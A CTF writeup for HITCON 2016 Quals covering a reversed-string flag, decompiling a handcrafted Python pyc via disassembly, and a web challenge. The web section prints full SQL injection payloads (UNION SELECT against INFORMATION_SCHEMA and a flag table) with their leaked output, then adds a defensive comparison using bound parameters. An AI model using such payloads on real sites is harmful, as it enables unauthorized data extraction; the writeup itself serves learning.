
HITCON CTF 2016 Quals Writeup

CTF writeup

The contest ran from 2016/10/8 11:00 (JST) to 2016/10/10 11:00 (JST).
I took part with my team again this time. We finished with 150 points, 226th out of 1024 teams.
This writeup covers the problems I solved myself.

Welcome (Reverse 50)

Just read the string backwards.

hitcon{Welcome to HITCON CTF}

Handcrafted pyc (Reverse 50)

Prepend a pyc header to the data and write it out as crackme.pyc.

#!/usr/bin/env python
import marshal, zlib, base64

# Python 2.7 magic number (03 f3 0d 0a) followed by a 4-byte timestamp
PYC_HEADER = b'\x03\xf3\x0d\x0a\x14\x0c\xf4\x57'

data = zlib.decompress(base64.b64decode('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'))

data = PYC_HEADER + data

with open('crackme.pyc', 'wb') as f:
    f.write(data)

Easy Python Decompiler could not decompile it. I also tried uncompyle2, with the same result. So I disassembled it with the tool at https://github.com/ershov/pycdump.

>python pycdis.py crackme.pyc > crackme_asm.txt

               :
            741 000342: 02E5: |71 F7 02| JUMP_ABSOLUTE          759
        >>  744 000345: 02E8: |74 01 00| LOAD_GLOBAL              1 (raw_input)
            747 000348: 02EB: |71 C8 05| JUMP_ABSOLUTE         1480
        >>  750 00034B: 02EE: |7C 00 00| LOAD_FAST                0 (password)
            753 00034E: 02F1: |6B 02 00| COMPARE_OP               2 (==)
            756 000351: 02F4: |71 FF 02| JUMP_ABSOLUTE          767
        >>  759 000354: 02F7: |02      | ROT_TWO             
            760 000355: 02F8: |7D 00 00| STORE_FAST               0 (password)
            763 000358: 02FB: |01      | POP_TOP             
            764 000359: 02FC: |71 E8 02| JUMP_ABSOLUTE          744
        >>  767 00035C: 02FF: |72 37 06| POP_JUMP_IF_FALSE     1591
            770 00035F: 0302: |74 00 00| LOAD_GLOBAL              0 (chr)
            773 000362: 0305: |64 11 00| LOAD_CONST              17 (99)
            776 000365: 0308: |83 01 00| CALL_FUNCTION            1
            779 000368: 030B: |74 00 00| LOAD_GLOBAL              0 (chr)
            782 00036B: 030E: |64 0A 00| LOAD_CONST              10 (116)
            785 00036E: 0311: |83 01 00| CALL_FUNCTION            1
            788 000371: 0314: |74 00 00| LOAD_GLOBAL              0 (chr)
            791 000374: 0317: |64 0E 00| LOAD_CONST              14 (105)
            794 000377: 031A: |83 01 00| CALL_FUNCTION            1
            797 00037A: 031D: |74 00 00| LOAD_GLOBAL              0 (chr)
            800 00037D: 0320: |64 09 00| LOAD_CONST               9 (104)
            803 000380: 0323: |83 01 00| CALL_FUNCTION            1
            806 000383: 0326: |02      | ROT_TWO             
            807 000384: 0327: |17      | BINARY_ADD          
            808 000385: 0328: |02      | ROT_TWO             
            809 000386: 0329: |17      | BINARY_ADD          
            810 000387: 032A: |02      | ROT_TWO             
            811 000388: 032B: |17      | BINARY_ADD          
            812 000389: 032C: |74 00 00| LOAD_GLOBAL              0 (chr)
            815 00038C: 032F: |64 18 00| LOAD_CONST              24 (78)
            818 00038F: 0332: |83 01 00| CALL_FUNCTION            1
            821 000392: 0335: |74 00 00| LOAD_GLOBAL              0 (chr)
            824 000395: 0338: |64 19 00| LOAD_CONST              25 (123)
            827 000398: 033B: |83 01 00| CALL_FUNCTION            1
            830 00039B: 033E: |74 00 00| LOAD_GLOBAL              0 (chr)
            833 00039E: 0341: |64 0B 00| LOAD_CONST              11 (110)
            836 0003A1: 0344: |83 01 00| CALL_FUNCTION            1
            839 0003A4: 0347: |74 00 00| LOAD_GLOBAL              0 (chr)
            842 0003A7: 034A: |64 0C 00| LOAD_CONST              12 (111)
            845 0003AA: 034D: |83 01 00| CALL_FUNCTION            1
            848 0003AD: 0350: |02      | ROT_TWO             
            849 0003AE: 0351: |17      | BINARY_ADD          
            850 0003AF: 0352: |02      | ROT_TWO             
            851 0003B0: 0353: |17      | BINARY_ADD          
            852 0003B1: 0354: |02      | ROT_TWO             
            853 0003B2: 0355: |17      | BINARY_ADD          
            854 0003B3: 0356: |17      | BINARY_ADD          
            855 0003B4: 0357: |74 00 00| LOAD_GLOBAL              0 (chr)
            858 0003B7: 035A: |64 07 00| LOAD_CONST               7 (121)
            861 0003BA: 035D: |83 01 00| CALL_FUNCTION            1
            864 0003BD: 0360: |74 00 00| LOAD_GLOBAL              0 (chr)
            867 0003C0: 0363: |64 04 00| LOAD_CONST               4 (32)
            870 0003C3: 0366: |83 01 00| CALL_FUNCTION            1
            873 0003C6: 0369: |74 00 00| LOAD_GLOBAL              0 (chr)
            876 0003C9: 036C: |64 1A 00| LOAD_CONST              26 (119)
            879 0003CC: 036F: |83 01 00| CALL_FUNCTION            1
            882 0003CF: 0372: |74 00 00| LOAD_GLOBAL              0 (chr)
            885 0003D2: 0375: |64 0C 00| LOAD_CONST              12 (111)
            888 0003D5: 0378: |83 01 00| CALL_FUNCTION            1
            891 0003D8: 037B: |02      | ROT_TWO             
            892 0003D9: 037C: |17      | BINARY_ADD          
            893 0003DA: 037D: |02      | ROT_TWO             
            894 0003DB: 037E: |17      | BINARY_ADD          
            895 0003DC: 037F: |02      | ROT_TWO             
            896 0003DD: 0380: |17      | BINARY_ADD          
            897 0003DE: 0381: |74 00 00| LOAD_GLOBAL              0 (chr)
            900 0003E1: 0384: |64 11 00| LOAD_CONST              17 (99)
            903 0003E4: 0387: |83 01 00| CALL_FUNCTION            1
            906 0003E7: 038A: |74 00 00| LOAD_GLOBAL              0 (chr)
            909 0003EA: 038D: |64 04 00| LOAD_CONST               4 (32)
            912 0003ED: 0390: |83 01 00| CALL_FUNCTION            1
            915 0003F0: 0393: |74 00 00| LOAD_GLOBAL              0 (chr)
            918 0003F3: 0396: |64 10 00| LOAD_CONST              16 (117)
            921 0003F6: 0399: |83 01 00| CALL_FUNCTION            1
            924 0003F9: 039C: |74 00 00| LOAD_GLOBAL              0 (chr)
            927 0003FC: 039F: |64 0C 00| LOAD_CONST              12 (111)
            930 0003FF: 03A2: |83 01 00| CALL_FUNCTION            1
            933 000402: 03A5: |02      | ROT_TWO             
            934 000403: 03A6: |17      | BINARY_ADD          
            935 000404: 03A7: |02      | ROT_TWO             
            936 000405: 03A8: |17      | BINARY_ADD          
            937 000406: 03A9: |02      | ROT_TWO             
            938 000407: 03AA: |17      | BINARY_ADD          
            939 000408: 03AB: |17      | BINARY_ADD          
            940 000409: 03AC: |17      | BINARY_ADD          
            941 00040A: 03AD: |74 00 00| LOAD_GLOBAL              0 (chr)
            944 00040D: 03B0: |64 11 00| LOAD_CONST              17 (99)
            947 000410: 03B3: |83 01 00| CALL_FUNCTION            1
            950 000413: 03B6: |74 00 00| LOAD_GLOBAL              0 (chr)
            953 000416: 03B9: |64 04 00| LOAD_CONST               4 (32)
            956 000419: 03BC: |83 01 00| CALL_FUNCTION            1
            959 00041C: 03BF: |74 00 00| LOAD_GLOBAL              0 (chr)
            962 00041F: 03C2: |64 0B 00| LOAD_CONST              11 (110)
            965 000422: 03C5: |83 01 00| CALL_FUNCTION            1
            968 000425: 03C8: |74 00 00| LOAD_GLOBAL              0 (chr)
            971 000428: 03CB: |64 02 00| LOAD_CONST               2 (97)
            974 00042B: 03CE: |83 01 00| CALL_FUNCTION            1
            977 00042E: 03D1: |02      | ROT_TWO             
            978 00042F: 03D2: |17      | BINARY_ADD          
            979 000430: 03D3: |02      | ROT_TWO             
            980 000431: 03D4: |17      | BINARY_ADD          
            981 000432: 03D5: |02      | ROT_TWO             
            982 000433: 03D6: |17      | BINARY_ADD          
            983 000434: 03D7: |74 00 00| LOAD_GLOBAL              0 (chr)
            986 000437: 03DA: |64 0E 00| LOAD_CONST              14 (105)
            989 00043A: 03DD: |83 01 00| CALL_FUNCTION            1
            992 00043D: 03E0: |74 00 00| LOAD_GLOBAL              0 (chr)
            995 000440: 03E3: |64 14 00| LOAD_CONST              20 (112)
            998 000443: 03E6: |83 01 00| CALL_FUNCTION            1
           1001 000446: 03E9: |74 00 00| LOAD_GLOBAL              0 (chr)
           1004 000449: 03EC: |64 06 00| LOAD_CONST               6 (109)
           1007 00044C: 03EF: |83 01 00| CALL_FUNCTION            1
           1010 00044F: 03F2: |74 00 00| LOAD_GLOBAL              0 (chr)
           1013 000452: 03F5: |64 0C 00| LOAD_CONST              12 (111)
           1016 000455: 03F8: |83 01 00| CALL_FUNCTION            1
           1019 000458: 03FB: |02      | ROT_TWO             
           1020 000459: 03FC: |17      | BINARY_ADD          
           1021 00045A: 03FD: |02      | ROT_TWO             
           1022 00045B: 03FE: |17      | BINARY_ADD          
           1023 00045C: 03FF: |02      | ROT_TWO             
           1024 00045D: 0400: |17      | BINARY_ADD          
           1025 00045E: 0401: |17      | BINARY_ADD          
           1026 00045F: 0402: |74 00 00| LOAD_GLOBAL              0 (chr)
           1029 000462: 0405: |64 02 00| LOAD_CONST               2 (97)
           1032 000465: 0408: |83 01 00| CALL_FUNCTION            1
           1035 000468: 040B: |74 00 00| LOAD_GLOBAL              0 (chr)
           1038 00046B: 040E: |64 04 00| LOAD_CONST               4 (32)
           1041 00046E: 0411: |83 01 00| CALL_FUNCTION            1
           1044 000471: 0414: |74 00 00| LOAD_GLOBAL              0 (chr)
           1047 000474: 0417: |64 05 00| LOAD_CONST               5 (101)
           1050 000477: 041A: |83 01 00| CALL_FUNCTION            1
           1053 00047A: 041D: |74 00 00| LOAD_GLOBAL              0 (chr)
           1056 00047D: 0420: |64 01 00| LOAD_CONST               1 (108)
           1059 000480: 0423: |83 01 00| CALL_FUNCTION            1
           1062 000483: 0426: |02      | ROT_TWO             
           1063 000484: 0427: |17      | BINARY_ADD          
           1064 000485: 0428: |02      | ROT_TWO             
           1065 000486: 0429: |17      | BINARY_ADD          
           1066 000487: 042A: |02      | ROT_TWO             
           1067 000488: 042B: |17      | BINARY_ADD          
           1068 000489: 042C: |74 00 00| LOAD_GLOBAL              0 (chr)
           1071 00048C: 042F: |64 16 00| LOAD_CONST              22 (100)
           1074 00048F: 0432: |83 01 00| CALL_FUNCTION            1
           1077 000492: 0435: |74 00 00| LOAD_GLOBAL              0 (chr)
           1080 000495: 0438: |64 0B 00| LOAD_CONST              11 (110)
           1083 000498: 043B: |83 01 00| CALL_FUNCTION            1
           1086 00049B: 043E: |02      | ROT_TWO             
           1087 00049C: 043F: |17      | BINARY_ADD          
           1088 00049D: 0440: |74 00 00| LOAD_GLOBAL              0 (chr)
           1091 0004A0: 0443: |64 10 00| LOAD_CONST              16 (117)
           1094 0004A3: 0446: |83 01 00| CALL_FUNCTION            1
           1097 0004A6: 0449: |74 00 00| LOAD_GLOBAL              0 (chr)
           1100 0004A9: 044C: |64 0D 00| LOAD_CONST              13 (114)
           1103 0004AC: 044F: |83 01 00| CALL_FUNCTION            1
           1106 0004AF: 0452: |74 00 00| LOAD_GLOBAL              0 (chr)
           1109 0004B2: 0455: |64 04 00| LOAD_CONST               4 (32)
           1112 0004B5: 0458: |83 01 00| CALL_FUNCTION            1
           1115 0004B8: 045B: |02      | ROT_TWO             
           1116 0004B9: 045C: |17      | BINARY_ADD          
           1117 0004BA: 045D: |02      | ROT_TWO             
           1118 0004BB: 045E: |17      | BINARY_ADD          
           1119 0004BC: 045F: |17      | BINARY_ADD          
           1120 0004BD: 0460: |17      | BINARY_ADD          
           1121 0004BE: 0461: |17      | BINARY_ADD          
           1122 0004BF: 0462: |17      | BINARY_ADD          
           1123 0004C0: 0463: |74 00 00| LOAD_GLOBAL              0 (chr)
           1126 0004C3: 0466: |64 07 00| LOAD_CONST               7 (121)
           1129 0004C6: 0469: |83 01 00| CALL_FUNCTION            1
           1132 0004C9: 046C: |74 00 00| LOAD_GLOBAL              0 (chr)
           1135 0004CC: 046F: |64 08 00| LOAD_CONST               8 (80)
           1138 0004CF: 0472: |83 01 00| CALL_FUNCTION            1
           1141 0004D2: 0475: |74 00 00| LOAD_GLOBAL              0 (chr)
           1144 0004D5: 0478: |64 04 00| LOAD_CONST               4 (32)
           1147 0004D8: 047B: |83 01 00| CALL_FUNCTION            1
           1150 0004DB: 047E: |74 00 00| LOAD_GLOBAL              0 (chr)
           1153 0004DE: 0481: |64 0B 00| LOAD_CONST              11 (110)
           1156 0004E1: 0484: |83 01 00| CALL_FUNCTION            1
           1159 0004E4: 0487: |02      | ROT_TWO             
           1160 0004E5: 0488: |17      | BINARY_ADD          
           1161 0004E6: 0489: |02      | ROT_TWO             
           1162 0004E7: 048A: |17      | BINARY_ADD          
           1163 0004E8: 048B: |02      | ROT_TWO             
           1164 0004E9: 048C: |17      | BINARY_ADD          
           1165 0004EA: 048D: |74 00 00| LOAD_GLOBAL              0 (chr)
           1168 0004ED: 0490: |64 0B 00| LOAD_CONST              11 (110)
           1171 0004F0: 0493: |83 01 00| CALL_FUNCTION            1
           1174 0004F3: 0496: |74 00 00| LOAD_GLOBAL              0 (chr)
           1177 0004F6: 0499: |64 0C 00| LOAD_CONST              12 (111)
           1180 0004F9: 049C: |83 01 00| CALL_FUNCTION            1
           1183 0004FC: 049F: |74 00 00| LOAD_GLOBAL              0 (chr)
           1186 0004FF: 04A2: |64 09 00| LOAD_CONST               9 (104)
           1189 000502: 04A5: |83 01 00| CALL_FUNCTION            1
           1192 000505: 04A8: |74 00 00| LOAD_GLOBAL              0 (chr)
           1195 000508: 04AB: |64 0A 00| LOAD_CONST              10 (116)
           1198 00050B: 04AE: |83 01 00| CALL_FUNCTION            1
           1201 00050E: 04B1: |02      | ROT_TWO             
           1202 00050F: 04B2: |17      | BINARY_ADD          
           1203 000510: 04B3: |02      | ROT_TWO             
           1204 000511: 04B4: |17      | BINARY_ADD          
           1205 000512: 04B5: |02      | ROT_TWO             
           1206 000513: 04B6: |17      | BINARY_ADD          
           1207 000514: 04B7: |17      | BINARY_ADD          
           1208 000515: 04B8: |74 00 00| LOAD_GLOBAL              0 (chr)
           1211 000518: 04BB: |64 0A 00| LOAD_CONST              10 (116)
           1214 00051B: 04BE: |83 01 00| CALL_FUNCTION            1
           1217 00051E: 04C1: |74 00 00| LOAD_GLOBAL              0 (chr)
           1220 000521: 04C4: |64 07 00| LOAD_CONST               7 (121)
           1223 000524: 04C7: |83 01 00| CALL_FUNCTION            1
           1226 000527: 04CA: |74 00 00| LOAD_GLOBAL              0 (chr)
           1229 00052A: 04CD: |64 15 00| LOAD_CONST              21 (98)
           1232 00052D: 04D0: |83 01 00| CALL_FUNCTION            1
           1235 000530: 04D3: |74 00 00| LOAD_GLOBAL              0 (chr)
           1238 000533: 04D6: |64 04 00| LOAD_CONST               4 (32)
           1241 000536: 04D9: |83 01 00| CALL_FUNCTION            1
           1244 000539: 04DC: |02      | ROT_TWO             
           1245 00053A: 04DD: |17      | BINARY_ADD          
           1246 00053B: 04DE: |02      | ROT_TWO             
           1247 00053C: 04DF: |17      | BINARY_ADD          
           1248 00053D: 04E0: |02      | ROT_TWO             
           1249 00053E: 04E1: |17      | BINARY_ADD          
           1250 00053F: 04E2: |74 00 00| LOAD_GLOBAL              0 (chr)
           1253 000542: 04E5: |64 16 00| LOAD_CONST              22 (100)
           1256 000545: 04E8: |83 01 00| CALL_FUNCTION            1
           1259 000548: 04EB: |74 00 00| LOAD_GLOBAL              0 (chr)
           1262 00054B: 04EE: |64 0C 00| LOAD_CONST              12 (111)
           1265 00054E: 04F1: |83 01 00| CALL_FUNCTION            1
           1268 000551: 04F4: |74 00 00| LOAD_GLOBAL              0 (chr)
           1271 000554: 04F7: |64 11 00| LOAD_CONST              17 (99)
           1274 000557: 04FA: |83 01 00| CALL_FUNCTION            1
           1277 00055A: 04FD: |74 00 00| LOAD_GLOBAL              0 (chr)
           1280 00055D: 0500: |64 05 00| LOAD_CONST               5 (101)
           1283 000560: 0503: |83 01 00| CALL_FUNCTION            1
           1286 000563: 0506: |02      | ROT_TWO             
           1287 000564: 0507: |17      | BINARY_ADD          
           1288 000565: 0508: |02      | ROT_TWO             
           1289 000566: 0509: |17      | BINARY_ADD          
           1290 000567: 050A: |02      | ROT_TWO             
           1291 000568: 050B: |17      | BINARY_ADD          
           1292 000569: 050C: |17      | BINARY_ADD          
           1293 00056A: 050D: |17      | BINARY_ADD          
           1294 00056B: 050E: |74 00 00| LOAD_GLOBAL              0 (chr)
           1297 00056E: 0511: |64 0B 00| LOAD_CONST              11 (110)
           1300 000571: 0514: |83 01 00| CALL_FUNCTION            1
           1303 000574: 0517: |74 00 00| LOAD_GLOBAL              0 (chr)
           1306 000577: 051A: |64 0E 00| LOAD_CONST              14 (105)
           1309 00057A: 051D: |83 01 00| CALL_FUNCTION            1
           1312 00057D: 0520: |74 00 00| LOAD_GLOBAL              0 (chr)
           1315 000580: 0523: |64 04 00| LOAD_CONST               4 (32)
           1318 000583: 0526: |83 01 00| CALL_FUNCTION            1
           1321 000586: 0529: |74 00 00| LOAD_GLOBAL              0 (chr)
           1324 000589: 052C: |64 05 00| LOAD_CONST               5 (101)
           1327 00058C: 052F: |83 01 00| CALL_FUNCTION            1
           1330 00058F: 0532: |02      | ROT_TWO             
           1331 000590: 0533: |17      | BINARY_ADD          
           1332 000591: 0534: |02      | ROT_TWO             
           1333 000592: 0535: |17      | BINARY_ADD          
           1334 000593: 0536: |02      | ROT_TWO             
           1335 000594: 0537: |17      | BINARY_ADD          
           1336 000595: 0538: |74 00 00| LOAD_GLOBAL              0 (chr)
           1339 000598: 053B: |64 10 00| LOAD_CONST              16 (117)
           1342 00059B: 053E: |83 01 00| CALL_FUNCTION            1
           1345 00059E: 0541: |74 00 00| LOAD_GLOBAL              0 (chr)
           1348 0005A1: 0544: |64 0C 00| LOAD_CONST              12 (111)
           1351 0005A4: 0547: |83 01 00| CALL_FUNCTION            1
           1354 0005A7: 054A: |74 00 00| LOAD_GLOBAL              0 (chr)
           1357 0005AA: 054D: |64 07 00| LOAD_CONST               7 (121)
           1360 0005AD: 0550: |83 01 00| CALL_FUNCTION            1
           1363 0005B0: 0553: |74 00 00| LOAD_GLOBAL              0 (chr)
           1366 0005B3: 0556: |64 04 00| LOAD_CONST               4 (32)
           1369 0005B6: 0559: |83 01 00| CALL_FUNCTION            1
           1372 0005B9: 055C: |02      | ROT_TWO             
           1373 0005BA: 055D: |17      | BINARY_ADD          
           1374 0005BB: 055E: |02      | ROT_TWO             
           1375 0005BC: 055F: |17      | BINARY_ADD          
           1376 0005BD: 0560: |02      | ROT_TWO             
           1377 0005BE: 0561: |17      | BINARY_ADD          
           1378 0005BF: 0562: |17      | BINARY_ADD          
           1379 0005C0: 0563: |74 00 00| LOAD_GLOBAL              0 (chr)
           1382 0005C3: 0566: |64 0D 00| LOAD_CONST              13 (114)
           1385 0005C6: 0569: |83 01 00| CALL_FUNCTION            1
           1388 0005C9: 056C: |74 00 00| LOAD_GLOBAL              0 (chr)
           1391 0005CC: 056F: |64 15 00| LOAD_CONST              21 (98)
           1394 0005CF: 0572: |83 01 00| CALL_FUNCTION            1
           1397 0005D2: 0575: |74 00 00| LOAD_GLOBAL              0 (chr)
           1400 0005D5: 0578: |64 04 00| LOAD_CONST               4 (32)
           1403 0005D8: 057B: |83 01 00| CALL_FUNCTION            1
           1406 0005DB: 057E: |74 00 00| LOAD_GLOBAL              0 (chr)
           1409 0005DE: 0581: |64 0D 00| LOAD_CONST              13 (114)
           1412 0005E1: 0584: |83 01 00| CALL_FUNCTION            1
           1415 0005E4: 0587: |02      | ROT_TWO             
           1416 0005E5: 0588: |17      | BINARY_ADD          
           1417 0005E6: 0589: |02      | ROT_TWO             
           1418 0005E7: 058A: |17      | BINARY_ADD          
           1419 0005E8: 058B: |02      | ROT_TWO             
           1420 0005E9: 058C: |17      | BINARY_ADD          
           1421 0005EA: 058D: |74 00 00| LOAD_GLOBAL              0 (chr)
           1424 0005ED: 0590: |64 0E 00| LOAD_CONST              14 (105)
           1427 0005F0: 0593: |83 01 00| CALL_FUNCTION            1
           1430 0005F3: 0596: |74 00 00| LOAD_GLOBAL              0 (chr)
           1433 0005F6: 0599: |64 02 00| LOAD_CONST               2 (97)
           1436 0005F9: 059C: |83 01 00| CALL_FUNCTION            1
           1439 0005FC: 059F: |02      | ROT_TWO             
           1440 0005FD: 05A0: |17      | BINARY_ADD          
           1441 0005FE: 05A1: |74 00 00| LOAD_GLOBAL              0 (chr)
           1444 000601: 05A4: |64 1B 00| LOAD_CONST              27 (125)
           1447 000604: 05A7: |83 01 00| CALL_FUNCTION            1
           1450 000607: 05AA: |74 00 00| LOAD_GLOBAL              0 (chr)
           1453 00060A: 05AD: |64 12 00| LOAD_CONST              18 (33)
           1456 00060D: 05B0: |83 01 00| CALL_FUNCTION            1
           1459 000610: 05B3: |74 00 00| LOAD_GLOBAL              0 (chr)
           1462 000613: 05B6: |64 0B 00| LOAD_CONST              11 (110)
           1465 000616: 05B9: |83 01 00| CALL_FUNCTION            1
           1468 000619: 05BC: |02      | ROT_TWO             
           1469 00061A: 05BD: |17      | BINARY_ADD          
           1470 00061B: 05BE: |02      | ROT_TWO             
           1471 00061C: 05BF: |17      | BINARY_ADD          
           1472 00061D: 05C0: |17      | BINARY_ADD          
           1473 00061E: 05C1: |17      | BINARY_ADD          
           1474 00061F: 05C2: |17      | BINARY_ADD          
           1475 000620: 05C3: |17      | BINARY_ADD          
           1476 000621: 05C4: |17      | BINARY_ADD          
               :

Near the password prompt there is a comparison, followed by a run of ASCII codes.
Reading each chunk below in reverse order looks like it will give the flag.

99 116 105 104
78 123 110 111
121 32 119 111
99 32 117 111
99 32 110 97
105 112 109 111
97 32 101 108
100 110
117 114 32
121 80 32 110
110 111 104 116
116 121 98 32
100 111 99 101
110 105 32 101
117 111 121 32
114 98 32 114
105 97
125 33 110

Save the above as codes.txt and run the following code.

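# Each line of codes.txt is one chunk of ASCII codes from the disassembly.
with open('codes.txt', 'r') as f:
    lines = f.readlines()

flag = ''
for line in lines:
    # split() tolerates trailing spaces and blank lines
    codes = line.split()
    s = ''
    for code in codes:
        s += chr(int(code))
    # Each chunk is stored back to front, so reverse it before appending.
    flag += s[::-1]

print(flag)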
hitcon{Now you can compile and run Python bytecode in your brain!}
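
Each chunk reads backwards because every ROT_TWO / BINARY_ADD pair appends the next-deeper stack item to the string on top, so the last character pushed comes first. The Python 3 code below is an added example, not part of the original writeup: it replays offsets 770-854 of the listing above on a small value stack (ROW, LISTING and emulate are names made up for this example) and leaves the first eight characters of the flag on the stack.

```python
import re

# One pycdis row: |raw bytes| OPNAME [arg [(resolved value)]]
ROW = re.compile(r"\|[0-9A-F ]+\|\s+([A-Z_]+)(?:\s+(\d+)(?:\s+\((.*)\))?)?")
# Offsets 770-854, copied from the listing above (trailing spaces trimmed).
LISTING = """\
770 00035F: 0302: |74 00 00| LOAD_GLOBAL              0 (chr)
773 000362: 0305: |64 11 00| LOAD_CONST              17 (99)
776 000365: 0308: |83 01 00| CALL_FUNCTION            1
779 000368: 030B: |74 00 00| LOAD_GLOBAL              0 (chr)
782 00036B: 030E: |64 0A 00| LOAD_CONST              10 (116)
785 00036E: 0311: |83 01 00| CALL_FUNCTION            1
788 000371: 0314: |74 00 00| LOAD_GLOBAL              0 (chr)
791 000374: 0317: |64 0E 00| LOAD_CONST              14 (105)
794 000377: 031A: |83 01 00| CALL_FUNCTION            1
797 00037A: 031D: |74 00 00| LOAD_GLOBAL              0 (chr)
800 00037D: 0320: |64 09 00| LOAD_CONST               9 (104)
803 000380: 0323: |83 01 00| CALL_FUNCTION            1
806 000383: 0326: |02      | ROT_TWO
807 000384: 0327: |17      | BINARY_ADD
808 000385: 0328: |02      | ROT_TWO
809 000386: 0329: |17      | BINARY_ADD
810 000387: 032A: |02      | ROT_TWO
811 000388: 032B: |17      | BINARY_ADD
812 000389: 032C: |74 00 00| LOAD_GLOBAL              0 (chr)
815 00038C: 032F: |64 18 00| LOAD_CONST              24 (78)
818 00038F: 0332: |83 01 00| CALL_FUNCTION            1
821 000392: 0335: |74 00 00| LOAD_GLOBAL              0 (chr)
824 000395: 0338: |64 19 00| LOAD_CONST              25 (123)
827 000398: 033B: |83 01 00| CALL_FUNCTION            1
830 00039B: 033E: |74 00 00| LOAD_GLOBAL              0 (chr)
833 00039E: 0341: |64 0B 00| LOAD_CONST              11 (110)
836 0003A1: 0344: |83 01 00| CALL_FUNCTION            1
839 0003A4: 0347: |74 00 00| LOAD_GLOBAL              0 (chr)
842 0003A7: 034A: |64 0C 00| LOAD_CONST              12 (111)
845 0003AA: 034D: |83 01 00| CALL_FUNCTION            1
848 0003AD: 0350: |02      | ROT_TWO
849 0003AE: 0351: |17      | BINARY_ADD
850 0003AF: 0352: |02      | ROT_TWO
851 0003B0: 0353: |17      | BINARY_ADD
852 0003B1: 0354: |02      | ROT_TWO
853 0003B2: 0355: |17      | BINARY_ADD
854 0003B3: 0356: |17      | BINARY_ADD
"""

def emulate(listing):
    # Replay the rows on a value stack; only the opcodes seen above are modelled.
    stack = []
    for line in listing.splitlines():
        m = ROW.search(line)
        if not m:
            continue
        op, arg, val = m.groups()
        if op == "LOAD_GLOBAL":
            stack.append(("global", val))
        elif op == "LOAD_CONST":
            stack.append(int(val))
        elif op == "CALL_FUNCTION":
            value, func = stack.pop(), stack.pop()
            if func != ("global", "chr") or arg != "1":
                raise ValueError("only chr(x) calls are modelled")
            stack.append(chr(value))
        elif op == "ROT_TWO":       # swap the two topmost items
            stack[-1], stack[-2] = stack[-2], stack[-1]
        elif op == "BINARY_ADD":    # TOS = TOS1 + TOS
            tos, tos1 = stack.pop(), stack.pop()
            stack.append(tos1 + tos)
        else:
            raise ValueError("unsupported opcode: " + op)
    return stack

if __name__ == "__main__":
    print(emulate(LISTING))  # ['hitcon{N']
```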

Are you rich? (Web 50)

SQL injection is possible.
In the Address field, adjust the limit clause to choose which row comes back, and extract the information one row at a time.

Address:
18Tx7MqRaUfkejuZT2h4DstD6CjemxvZ9E' union select table_name from INFORMATION_SCHEMA.TABLES limit 62,1 #
        ↓
Error!: Remote API server reject your invalid address 'flag1'. If your address is valid, please PM @cebrusfs or other admin on IRC.

Address:
18Tx7MqRaUfkejuZT2h4DstD6CjemxvZ9E' union select flag from flag1 limit 1,1 #
        ↓
Error!: Remote API server reject your invalid address 'hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}'. If your address is valid, please PM @cebrusfs or other admin on IRC.
hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}
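
The leak works because the looked-up value is echoed back inside the error message. The Python 3 code below is an added example, not the challenge's server code (which is not on this page): it contrasts a concatenated query with a bound one and with a format check. Assumptions: an in-memory SQLite database stands in for the real backend (so the comment marker is -- rather than #), the users table and all function names are hypothetical, and the secret value is constructed.

```python
import re
import sqlite3

# Shape check for a legacy Base58 address (format only, no checksum).
ADDRESS_RE = re.compile(r"[13][1-9A-HJ-NP-Za-km-z]{25,34}")
KNOWN = "18Tx7MqRaUfkejuZT2h4DstD6CjemxvZ9E"   # address string from the page
SECRET = "FLAG{constructed-secret}"            # constructed stand-in value


def make_db():
    # Hypothetical schema: only the flag1 table and flag column appear on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (address TEXT)")
    db.execute("CREATE TABLE flag1 (flag TEXT)")
    db.execute("INSERT INTO users VALUES (?)", (KNOWN,))
    db.execute("INSERT INTO flag1 VALUES (?)", (SECRET,))
    return db


def find_concat(db, address):
    # Vulnerable: the input becomes part of the SQL text, so a quote ends the
    # string literal and the rest is parsed as SQL.
    sql = "SELECT address FROM users WHERE address = '" + address + "'"
    return db.execute(sql).fetchone()


def find_bound(db, address):
    # Hardened: the value is bound as data and never reaches the SQL parser.
    return db.execute("SELECT address FROM users WHERE address = ?",
                      (address,)).fetchone()


def respond(row):
    # Mirrors the page's error text, which echoes the looked-up value.
    if row is None:
        return "Error!: unknown address"
    return "Error!: Remote API server reject your invalid address '%s'." % row[0]


def handle(db, address):
    # Validate the format first (fixed error text, nothing echoed), then bind.
    if not ADDRESS_RE.fullmatch(address):
        return "Error!: invalid address"
    return respond(find_bound(db, address))


# Constructed input with the same UNION shape as the page's Address value.
PROBE = "x' UNION SELECT flag FROM flag1 -- "

if __name__ == "__main__":
    db = make_db()
    print(respond(find_concat(db, PROBE)))   # secret appears in the error text
    print(handle(db, PROBE))                 # rejected before any query runs
```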